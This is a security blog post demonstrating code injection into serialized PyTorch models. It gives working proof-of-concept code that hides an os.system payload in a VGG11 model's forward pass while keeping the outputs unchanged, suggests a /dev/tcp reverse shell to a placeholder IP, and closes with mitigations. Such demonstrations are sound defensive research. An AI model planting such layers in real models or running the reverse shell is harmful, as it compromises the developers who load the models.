PyTorch Model Code Injection

As I am learning about ML security and thinking through the threat models one of ideas I find most intriguing is the concept of Models as Code. Models are large, serialized files shared by internal ML teams and through public repos like [PyTorch Hub](https://github.com/pytorch/hub) or [Huggingface Hub](https://github.com/huggingface/huggingface_hub) written to run on user machines or shared notebook servers in a dev environment and in production use. This usage pattern introduces significant risk into the supply chain. As a security engineer I have a lot of experience with this class of issues, every company I have ever worked for was smartly working on securing their software's package ecosystem. I immediately started searching for proof-of-concept remote code execution attacks. I was not able to find any good articles so I loaded up VS Code and tried to insert myself code myself. My objective is to insert malicious code into an existing model that a victim would trigger when loading and running a model. ## Loading Model First let's see how we would load and use a model: ```python # Load pytorch model from hub torch.hub.load('/repo/') torch.hub.download_url_to_file('https://s3.amazonaws.com/models/resnet18-5c106cde.pth', '/tmp/temporary_file') # Load pytorch model torch.load('locals/model.pt') # Save pytorch model torch.save('locals/model.pt') ``` Review the official [saving and loading documentation](https://pytorch.org/tutorials/beginner/basics/saveloadrun_tutorial.html) for more information. For our current project we only need to know that models can be loaded from anywhere be that the local filesystem to s3 buckets and that torch.save is equivalent to serializing the entire nn.Module object using Pickle and saving it to disk. ## Model Architecture Model architecture is a complex subject which I will not go into here, for our purposes we can think of archietcture as how we define all the layers in our network and how the layers will interact with each other. The following code shows the fundamental structure of a PyTorch model: It contains the __ init __ method where we define the layers and a forward() method that explains how the input is propagated forward through the defined layers. The __ init __ method is invoked when you create an instance of the nn.Module. Here you will define the various parameters of a layer such as filters, kernel size for a convolutional layer, and dropout probability for the dropout layer. The forward() function is where you define how your output is computed. This function doesn't need to be explicitly called and can be run by just calling the nn.Module instance like a function with the input as it's argument. Let's create a simple example in which we initialize a `nn.Sequential()` base model, add the `ExploitLayer` which has a special `exploit()` function that creates a file on the system, and then saves the model: ```python import torch import torch.nn as nn class ExploitLayer(nn.Module): def __init__(self): super(ExploitLayer, self).__init__() def forward(self, x): print('forward() function called') self.exploit() return self def exploit(self): import os os.system("touch pwned") return self # create a model model = nn.Sequential() # add a malicious layer model.add_module('exploit', ExploitLayer()) # call forward() on the model to create the model graph x = torch.rand(1, 28, 28) model(x) # save the model torch.save(model, 'exploit-model.pt') ``` We can now pass the model around and have it execute on any developers machine by loading the following way: ```python model = torch.load('exploit-model.pt') x = torch.rand(1, 28, 28) model(x) ``` ## RCE on Existing Model It is easy to create a contrived example but let us attempt to insert a malicious layer into an existing and legitimate model. It is important that our modified model produces the same results as the original model to not let anyone notice. I searched the PyTorch hub repo and picked the simple [vgg11 vision model.](https://pytorch.org/hub/pytorch_vision_vgg/) This example code was taken directly from the readme: ```python import torch model = torch.hub.load('pytorch/vision:v0.10.0', 'vgg11', pretrained=True) model.eval() # Download an example image from the pytorch website import urllib url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg") try: urllib.URLopener().retrieve(url, filename) except: urllib.request.urlretrieve(url, filename) # sample execution from PIL import Image from torchvision import transforms input_image = Image.open(filename) preprocess = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]), ]) input_tensor = preprocess(input_image) input_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model model(input_batch) ``` Running that code produces the following output: ```txt tensor([[-1.4892e+00, -1.6809e+00, -1.2466e+00, -2.5329e+00, -1.5367e+00, -1.1485e+00, -1.5428e+00, 2.6894e+00, 4.0779e+00, -2.7479e+00, -4.7201e+00, -2.7696e+00, -4.5199e+00, -3.2565e+00, -2.7174e+00, ... ``` Now we must figure out how to insert the ExploitLayer() into our model and save it. I experimented with several methods particularly the `torch.add_module()` but that was not triggering our forward() function. After much resaerch I found that to ensure that the `ExploitLayer` is always called when running the model, you need to insert it into the forward pass of the model. In our example using VGG11 as the base model we would have to subclass the VGG model and override the `forward` function to include the `ExploitLayer`. ```python import torch import torch.nn as nn #load legit model model = torch.hub.load('pytorch/vision:v0.10.0', 'vgg11', pretrained=True) model.eval() class ExploitLayer(nn.Module): def __init__(self): super(ExploitLayer, self).__init__() def forward(self, x): print('forward() function called') return self.exploit(x) def exploit(self, x): import os os.system("touch pwned") return x # subclass and override the forward() function class VGGWithExploit(nn.Module): def __init__(self, model, exploit_layer): super(VGGWithExploit, self).__init__() self.features = model.features self.avgpool = model.avgpool self.classifier = model.classifier self.exploit_layer = exploit_layer def forward(self, x): x = self.features(x) x = self.avgpool(x) x = torch.flatten(x, 1) x = self.exploit_layer(x) # Call exploit layer here x = self.classifier(x) return x # create model with exploit_layer exploit_layer = ExploitLayer() exploit_model = VGGWithExploit(model, exploit_layer) # test model x = torch.randn(1, 3, 224, 224) output = exploit_model(x) #save model torch.save(exploit_model, 'visionmodel.pt') ``` If you're following along in your IDE you have seen that running this succesfully created a `pwned` file and saved the model. Now to test if our model is working the same as before we call the same vgg sample code only loading our malicious model instead. ```python import torch model = torch.load('visionmodel.pt') model.eval() # Download an example image from the pytorch website import urllib url, filename = ("https://github.com/pytorch/hub/raw/master/images/dog.jpg", "dog.jpg") try: urllib.URLopener().retrieve(url, filename) except: urllib.request.urlretrieve(url, filename) # sample execution from PIL import Image from torchvision import transforms filename = "dog.jpg" input_image = Image.open(filename) preprocess = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]), ]) input_tensor = preprocess(input_image) input_batch = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model model(input_batch) ``` As we can see after running; our debugging forward() print call and file creation worked but more importantly the results were the same as the untainted example. This means the model would work as intended. ```txt forward() function called tensor([[-1.4892e+00, -1.6809e+00, -1.2466e+00, -2.5329e+00, -1.5367e+00, -1.1485e+00, -1.5428e+00, 2.6894e+00, 4.0779e+00, -2.7479e+00, -4.7201e+00, -2.7696e+00, -4.5199e+00, -3.2565e+00, -2.7174e+00, ... ``` We should also note this is just one proof of concept. I would remove the forward() print statement and replace the `os.system()` call with something like `/bin/bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1` to run a reverse shell or something less detectible than touching the filesystem. The matter of fact is that out powers are unlimited, PyTorch code can read and write files, send and receive data over the network, and even spawn additional processes. And all these tasks are performed with the permission of the PyTorch process. # Conclusion and Next Steps We were able to insert code and execute it by calling the model. This was very simple and detectible POC, adding a `print(model)` line would show the following output: `(exploit_layer): ExploitLayer()`. A skilled attacker would be obfuscate the name and attempt to hide the code. This is an open area of research that I would like to dive deeper into, particularly when combined with research like [this paper](https://arxiv.org/abs/2204.06974) about planting undetectable backdoors in ML models. It seems entirely feasible to hide undetectable malicious code into these models. I will add that to the 'research later' list for now. ## Mitigations The core idea here is that the set of computation primitives available to PyTorch is powerful enough that you should assume that the PyTorch process effectively executes arbitrary code. The mitigation we shoud take to lower risk are simple secure computing ideas: * The environment should run with lowest privileges possible, don't run your notebooks with sudo. * Your team should also **always** execute untrusted models inside a sandbox like [nsjail.](https://github.com/google/nsjail) * Your networks should be properly segregated and segmented, the should use the principles of least privilege, and refine the auth process. * Your team should expend significant effort to keep track of the model supply chain perhaps with a designated model repo. * Implement developer education, models are code and we shouldn't run anything we find outside or our designated safe repository. Thanks and see you again soon!